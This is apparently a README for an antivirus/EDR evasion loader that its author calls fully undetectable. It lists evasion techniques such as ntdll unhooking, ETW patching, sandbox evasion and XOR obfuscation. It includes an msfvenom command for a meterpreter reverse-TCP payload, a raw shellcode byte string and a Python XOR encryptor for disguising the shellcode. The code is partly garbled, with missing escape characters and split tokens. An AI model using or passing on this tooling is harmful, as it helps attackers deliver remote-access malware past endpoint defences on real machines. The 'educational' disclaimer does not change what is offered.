It’s a AV/EDR Evasion tool created to bypass security tools for learning, until now the tool is FUD.
- Module Stomping for Memory scanning evasion
- DLL Unhooking by fresh ntdll copy
- IAT Hiding and Obfuscation & API Unhooking
- ETW Patchnig for bypassing some security controls
- Included sandbox evasion techniques & Basic Anti-Debugging
- Fully obfuscated (Functions – Keys – Shellcode) by XOR-ing
- Shellcode reversed and Encrypted
- Moving payload into hallowed memory without using APIs
- GetProcAddress & GetModuleHandle Implementation by @cocomelonc
- Runs without creating new thread & Suppoers x64 and x86 arch
Generate your shellcode with msfvenom tool :
msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST LPORT -f py
Then copy the output into the encryptor XOR function :
data = b"xfcxe8x82x00x00x00x60x89xe5x31xc0x64x8bx50x30x8bx52x0cx8bx52x14x8bx72x28x0fxb7x4ax26x31xffxacx3cx61x7cx02x2cx20xc1xcfx0dx01xc7xe2xf2x52x57x8bx52x10x8bx4ax3cx8bx4cx11x78xe3x48x01xd1x51x8bx59x20x01xd3x8bx49x18xe3x3ax49x8bx34x8bx01xd6x31xffxacxc1xcfx0dx01xc7x38xe0x75xf6x03x7dxf8x3bx7dx24x75xe4x58x8bx58x24x01xd3x66x8bx0cx4bx8bx58x1cx01xd3x8bx04x8bx01xd0x89x44x24x24x5bx5bx61x59x5ax51xffxe0x5fx5fx5ax8bx12xebx8dx5dx6ax01x8dx85xb2x00x00x00x50x68x31x8bx6fx87xffxd5xbbxf0xb5xa2x56x68xa6x95xbdx9dxffxd5x3cx06x7cx0ax80xfbxe0x75x05xbbx47x13x72x6fx6ax00x53xffxd5x63x61x6cx63x2ex65x78x65x00"key = 0x50 # Put here your key as byte like for example (0x90 or 0x40 or 0x30) and more...
print('{ ', end='')
for i in data:
print(hex(i ^ key), en d=', ')
print("0x0 };") # Notice that it adds one byte "0x0" to the end.
And then you can handle your decryption function, It’s not easy for script kiddies ^-^, you can read more about it in my articale :
This is the result when running :
https://antiscan.me/images/result/07OkIKKhpRsG.png
- First thanks to Abdallah Mohammed for helping me to develop it ^_^
- The tool is for educational purposes only
- Compile the code with visual studio compiler
